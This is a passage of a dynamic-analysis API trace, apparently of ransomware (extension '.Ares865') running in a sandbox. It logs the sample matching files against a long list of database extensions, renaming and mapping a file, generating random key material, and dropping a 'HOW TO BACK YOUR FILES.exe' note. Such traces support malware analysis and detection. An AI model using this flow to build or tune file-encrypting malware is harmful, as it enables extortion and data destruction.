lstrlenW (lpString="db3") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0088.914] lstrlenW (lpString="dbf") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0088.914] lstrlenW (lpString="mdf") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0088.914] lstrlenW (lpString="mdb") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0088.914] lstrlenW (lpString="sql") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0088.914] lstrlenW (lpString="sqlite") returned 6 [0088.914] lstrcmpiW (lpString1="r1.dat", lpString2="sqlite") returned -1 [0088.914] lstrlenW (lpString="sqlite3") returned 7 [0088.914] lstrcmpiW (lpString1="gr1.dat", lpString2="sqlite3") returned -1 [0088.914] lstrlenW (lpString="sqlitedb") returned 8 [0088.914] lstrcmpiW (lpString1="mgr1.dat", lpString2="sqlitedb") returned -1 [0088.914] lstrlenW (lpString="xml") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0088.914] lstrlenW (lpString="$er") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0088.914] lstrlenW (lpString="4dd") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0088.914] lstrlenW (lpString="4dl") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0088.915] lstrlenW (lpString="^^^") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0088.915] lstrlenW (lpString="abs") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0088.915] lstrlenW (lpString="abx") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0088.915] lstrlenW (lpString="accdb") returned 5 [0088.915] lstrcmpiW (lpString1="1.dat", lpString2="accdb") returned -1 [0088.915] lstrlenW (lpString="accdc") returned 5 [0088.915] lstrcmpiW (lpString1="1.dat", lpString2="accdc") returned -1 [0088.915] lstrlenW (lpString="accde") returned 5 [0088.915] lstrcmpiW (lpString1="1.dat", lpString2="accde") returned -1 [0088.915] lstrlenW (lpString="accdr") returned 5 [0088.915] lstrcmpiW (lpString1="1.dat", lpString2="accdr") returned -1 [0088.915] lstrlenW (lpString="accdt") returned 5 [0088.915] lstrcmpiW (lpString1="1.dat", lpString2="accdt") returned -1 [0088.915] lstrlenW (lpString="accdw") returned 5 [0088.915] lstrcmpiW (lpString1="1.dat", lpString2="accdw") returned -1 [0088.915] lstrlenW (lpString="accft") returned 5 [0088.915] lstrcmpiW (lpString1="1.dat", lpString2="accft") returned -1 [0088.915] lstrlenW (lpString="adb") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0088.915] lstrlenW (lpString="adb") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0088.915] lstrlenW (lpString="ade") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0088.915] lstrlenW (lpString="adf") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0088.915] lstrlenW (lpString="adn") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0088.915] lstrlenW (lpString="adp") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0088.915] lstrlenW (lpString="alf") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0088.915] lstrlenW (lpString="ask") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0088.915] lstrlenW (lpString="btr") returned 3 [0088.915] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0088.916] lstrlenW (lpString="cat") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0088.916] lstrlenW (lpString="cdb") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0088.916] lstrlenW (lpString="ckp") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0088.916] lstrlenW (lpString="cma") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0088.916] lstrlenW (lpString="cpd") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0088.916] lstrlenW (lpString="dacpac") returned 6 [0088.916] lstrcmpiW (lpString1="r1.dat", lpString2="dacpac") returned 1 [0088.916] lstrlenW (lpString="dad") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0088.916] lstrlenW (lpString="dadiagrams") returned 10 [0088.916] lstrlenW (lpString="daschema") returned 8 [0088.916] lstrcmpiW (lpString1="mgr1.dat", lpString2="daschema") returned 1 [0088.916] lstrlenW (lpString="db-journal") returned 10 [0088.916] lstrlenW (lpString="db-shm") returned 6 [0088.916] lstrcmpiW (lpString1="r1.dat", lpString2="db-shm") returned 1 [0088.916] lstrlenW (lpString="db-wal") returned 6 [0088.916] lstrcmpiW (lpString1="r1.dat", lpString2="db-wal") returned 1 [0088.916] lstrlenW (lpString="dbc") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0088.916] lstrlenW (lpString="dbs") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0088.916] lstrlenW (lpString="dbt") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0088.916] lstrlenW (lpString="dbv") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0088.916] lstrlenW (lpString="dbx") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0088.916] lstrlenW (lpString="dcb") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0088.916] lstrlenW (lpString="dct") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dct") returned -1 [0088.916] lstrlenW (lpString="dcx") returned 3 [0088.916] lstrcmpiW (lpString1="dat", lpString2="dcx") returned -1 [0088.916] lstrlenW (lpString="ddl") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="ddl") returned -1 [0088.917] lstrlenW (lpString="dlis") returned 4 [0088.917] lstrcmpiW (lpString1=".dat", lpString2="dlis") returned -1 [0088.917] lstrlenW (lpString="dp1") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="dp1") returned -1 [0088.917] lstrlenW (lpString="dqy") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="dqy") returned -1 [0088.917] lstrlenW (lpString="dsk") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="dsk") returned -1 [0088.917] lstrlenW (lpString="dsn") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="dsn") returned -1 [0088.917] lstrlenW (lpString="dtsx") returned 4 [0088.917] lstrcmpiW (lpString1=".dat", lpString2="dtsx") returned -1 [0088.917] lstrlenW (lpString="dxl") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="dxl") returned -1 [0088.917] lstrlenW (lpString="eco") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="eco") returned -1 [0088.917] lstrlenW (lpString="ecx") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="ecx") returned -1 [0088.917] lstrlenW (lpString="edb") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="edb") returned -1 [0088.917] lstrlenW (lpString="epim") returned 4 [0088.917] lstrcmpiW (lpString1=".dat", lpString2="epim") returned -1 [0088.917] lstrlenW (lpString="fcd") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="fcd") returned -1 [0088.917] lstrlenW (lpString="fdb") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="fdb") returned -1 [0088.917] lstrlenW (lpString="fic") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="fic") returned -1 [0088.917] lstrlenW (lpString="flexolibrary") returned 12 [0088.917] lstrlenW (lpString="fm5") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="fm5") returned -1 [0088.917] lstrlenW (lpString="fmp") returned 3 [0088.917] lstrcmpiW (lpString1="dat", lpString2="fmp") returned -1 [0088.917] lstrlenW (lpString="fmp12") returned 5 [0088.917] lstrcmpiW (lpString1="1.dat", lpString2="fmp12") returned -1 [0088.917] lstrlenW (lpString="fmpsl") returned 5 [0088.917] lstrcmpiW (lpString1="1.dat", lpString2="fmpsl") returned -1 [0088.917] lstrlenW (lpString="fol") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="fol") returned -1 [0088.918] lstrlenW (lpString="fp3") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="fp3") returned -1 [0088.918] lstrlenW (lpString="fp4") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="fp4") returned -1 [0088.918] lstrlenW (lpString="fp5") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="fp5") returned -1 [0088.918] lstrlenW (lpString="fp7") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="fp7") returned -1 [0088.918] lstrlenW (lpString="fpt") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="fpt") returned -1 [0088.918] lstrlenW (lpString="frm") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="frm") returned -1 [0088.918] lstrlenW (lpString="gdb") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="gdb") returned -1 [0088.918] lstrlenW (lpString="gdb") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="gdb") returned -1 [0088.918] lstrlenW (lpString="grdb") returned 4 [0088.918] lstrcmpiW (lpString1=".dat", lpString2="grdb") returned -1 [0088.918] lstrlenW (lpString="gwi") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="gwi") returned -1 [0088.918] lstrlenW (lpString="hdb") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="hdb") returned -1 [0088.918] lstrlenW (lpString="his") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="his") returned -1 [0088.918] lstrlenW (lpString="ib") returned 2 [0088.918] lstrcmpiW (lpString1="at", lpString2="ib") returned -1 [0088.918] lstrlenW (lpString="idb") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="idb") returned -1 [0088.918] lstrlenW (lpString="ihx") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="ihx") returned -1 [0088.918] lstrlenW (lpString="itdb") returned 4 [0088.918] lstrcmpiW (lpString1=".dat", lpString2="itdb") returned -1 [0088.918] lstrlenW (lpString="itw") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="itw") returned -1 [0088.918] lstrlenW (lpString="jet") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="jet") returned -1 [0088.918] lstrlenW (lpString="jtx") returned 3 [0088.918] lstrcmpiW (lpString1="dat", lpString2="jtx") returned -1 [0088.919] lstrlenW (lpString="kdb") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="kdb") returned -1 [0088.919] lstrlenW (lpString="kexi") returned 4 [0088.919] lstrcmpiW (lpString1=".dat", lpString2="kexi") returned -1 [0088.919] lstrlenW (lpString="kexic") returned 5 [0088.919] lstrcmpiW (lpString1="1.dat", lpString2="kexic") returned -1 [0088.919] lstrlenW (lpString="kexis") returned 5 [0088.919] lstrcmpiW (lpString1="1.dat", lpString2="kexis") returned -1 [0088.919] lstrlenW (lpString="lgc") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="lgc") returned -1 [0088.919] lstrlenW (lpString="lwx") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="lwx") returned -1 [0088.919] lstrlenW (lpString="maf") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="maf") returned -1 [0088.919] lstrlenW (lpString="maq") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="maq") returned -1 [0088.919] lstrlenW (lpString="mar") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="mar") returned -1 [0088.919] lstrlenW (lpString="marshal") returned 7 [0088.919] lstrcmpiW (lpString1="gr1.dat", lpString2="marshal") returned -1 [0088.919] lstrlenW (lpString="mas") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="mas") returned -1 [0088.919] lstrlenW (lpString="mav") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="mav") returned -1 [0088.919] lstrlenW (lpString="maw") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="maw") returned -1 [0088.919] lstrlenW (lpString="mdbhtml") returned 7 [0088.919] lstrcmpiW (lpString1="gr1.dat", lpString2="mdbhtml") returned -1 [0088.919] lstrlenW (lpString="mdn") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="mdn") returned -1 [0088.919] lstrlenW (lpString="mdt") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="mdt") returned -1 [0088.919] lstrlenW (lpString="mfd") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="mfd") returned -1 [0088.919] lstrlenW (lpString="mpd") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="mpd") returned -1 [0088.919] lstrlenW (lpString="mrg") returned 3 [0088.919] lstrcmpiW (lpString1="dat", lpString2="mrg") returned -1 [0088.919] lstrlenW (lpString="mud") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="mud") returned -1 [0088.920] lstrlenW (lpString="mwb") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="mwb") returned -1 [0088.920] lstrlenW (lpString="myd") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="myd") returned -1 [0088.920] lstrlenW (lpString="ndf") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="ndf") returned -1 [0088.920] lstrlenW (lpString="nnt") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="nnt") returned -1 [0088.920] lstrlenW (lpString="nrmlib") returned 6 [0088.920] lstrcmpiW (lpString1="r1.dat", lpString2="nrmlib") returned 1 [0088.920] lstrlenW (lpString="ns2") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="ns2") returned -1 [0088.920] lstrlenW (lpString="ns3") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="ns3") returned -1 [0088.920] lstrlenW (lpString="ns4") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="ns4") returned -1 [0088.920] lstrlenW (lpString="nsf") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="nsf") returned -1 [0088.920] lstrlenW (lpString="nv") returned 2 [0088.920] lstrcmpiW (lpString1="at", lpString2="nv") returned -1 [0088.920] lstrlenW (lpString="nv2") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="nv2") returned -1 [0088.920] lstrlenW (lpString="nwdb") returned 4 [0088.920] lstrcmpiW (lpString1=".dat", lpString2="nwdb") returned -1 [0088.920] lstrlenW (lpString="nyf") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="nyf") returned -1 [0088.920] lstrlenW (lpString="odb") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="odb") returned -1 [0088.920] lstrlenW (lpString="odb") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="odb") returned -1 [0088.920] lstrlenW (lpString="oqy") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="oqy") returned -1 [0088.920] lstrlenW (lpString="ora") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="ora") returned -1 [0088.920] lstrlenW (lpString="orx") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="orx") returned -1 [0088.920] lstrlenW (lpString="owc") returned 3 [0088.920] lstrcmpiW (lpString1="dat", lpString2="owc") returned -1 [0088.921] lstrlenW (lpString="p96") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="p96") returned -1 [0088.921] lstrlenW (lpString="p97") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="p97") returned -1 [0088.921] lstrlenW (lpString="pan") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="pan") returned -1 [0088.921] lstrlenW (lpString="pdb") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="pdb") returned -1 [0088.921] lstrlenW (lpString="pdm") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="pdm") returned -1 [0088.921] lstrlenW (lpString="pnz") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="pnz") returned -1 [0088.921] lstrlenW (lpString="qry") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="qry") returned -1 [0088.921] lstrlenW (lpString="qvd") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="qvd") returned -1 [0088.921] lstrlenW (lpString="rbf") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="rbf") returned -1 [0088.921] lstrlenW (lpString="rctd") returned 4 [0088.921] lstrcmpiW (lpString1=".dat", lpString2="rctd") returned -1 [0088.921] lstrlenW (lpString="rod") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="rod") returned -1 [0088.921] lstrlenW (lpString="rodx") returned 4 [0088.921] lstrcmpiW (lpString1=".dat", lpString2="rodx") returned -1 [0088.921] lstrlenW (lpString="rpd") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="rpd") returned -1 [0088.921] lstrlenW (lpString="rsd") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="rsd") returned -1 [0088.921] lstrlenW (lpString="sas7bdat") returned 8 [0088.921] lstrcmpiW (lpString1="mgr1.dat", lpString2="sas7bdat") returned -1 [0088.921] lstrlenW (lpString="sbf") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="sbf") returned -1 [0088.921] lstrlenW (lpString="scx") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="scx") returned -1 [0088.921] lstrlenW (lpString="sdb") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="sdb") returned -1 [0088.921] lstrlenW (lpString="sdc") returned 3 [0088.921] lstrcmpiW (lpString1="dat", lpString2="sdc") returned -1 [0088.922] lstrlenW (lpString="sdf") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="sdf") returned -1 [0088.922] lstrlenW (lpString="sis") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="sis") returned -1 [0088.922] lstrlenW (lpString="spq") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="spq") returned -1 [0088.922] lstrlenW (lpString="te") returned 2 [0088.922] lstrcmpiW (lpString1="at", lpString2="te") returned -1 [0088.922] lstrlenW (lpString="teacher") returned 7 [0088.922] lstrcmpiW (lpString1="gr1.dat", lpString2="teacher") returned -1 [0088.922] lstrlenW (lpString="tmd") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="tmd") returned -1 [0088.922] lstrlenW (lpString="tps") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="tps") returned -1 [0088.922] lstrlenW (lpString="trc") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="trc") returned -1 [0088.922] lstrlenW (lpString="trc") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="trc") returned -1 [0088.922] lstrlenW (lpString="trm") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="trm") returned -1 [0088.922] lstrlenW (lpString="udb") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="udb") returned -1 [0088.922] lstrlenW (lpString="udl") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="udl") returned -1 [0088.922] lstrlenW (lpString="usr") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="usr") returned -1 [0088.922] lstrlenW (lpString="v12") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="v12") returned -1 [0088.922] lstrlenW (lpString="vis") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="vis") returned -1 [0088.922] lstrlenW (lpString="vpd") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="vpd") returned -1 [0088.922] lstrlenW (lpString="vvv") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="vvv") returned -1 [0088.922] lstrlenW (lpString="wdb") returned 3 [0088.922] lstrcmpiW (lpString1="dat", lpString2="wdb") returned -1 [0088.922] lstrlenW (lpString="wmdb") returned 4 [0088.922] lstrcmpiW (lpString1=".dat", lpString2="wmdb") returned -1 [0088.922] lstrlenW (lpString="wrk") returned 3 [0088.923] lstrcmpiW (lpString1="dat", lpString2="wrk") returned -1 [0088.923] lstrlenW (lpString="xdb") returned 3 [0088.923] lstrcmpiW (lpString1="dat", lpString2="xdb") returned -1 [0088.923] lstrlenW (lpString="xld") returned 3 [0088.923] lstrcmpiW (lpString1="dat", lpString2="xld") returned -1 [0088.923] lstrlenW (lpString="xmlff") returned 5 [0088.923] lstrcmpiW (lpString1="1.dat", lpString2="xmlff") returned -1 [0088.923] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.Ares865") returned 65 [0088.923] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat.ares865"), dwFlags=0x1) returned 1 [0088.924] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.924] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4194304) returned 1 [0088.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.925] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.925] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.925] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.925] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.925] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400300, lpName=0x0) returned 0x15c [0088.927] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x300) returned 0x190000 [0088.927] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3030000 [0089.040] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.041] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.041] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.041] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.041] CloseHandle (hObject=0x15c) returned 1 [0089.041] CloseHandle (hObject=0x118) returned 1 [0089.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.051] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0 [0089.051] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.051] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0089.051] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Connections", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections" [0089.051] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0089.051] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0089.051] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned 48 [0089.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Microsoft\\Network\\Connections" [0089.051] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.051] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.052] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.052] GetLastError () returned 0x0 [0089.052] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.052] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.052] CloseHandle (hObject=0x120) returned 1 [0089.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.052] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.052] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, 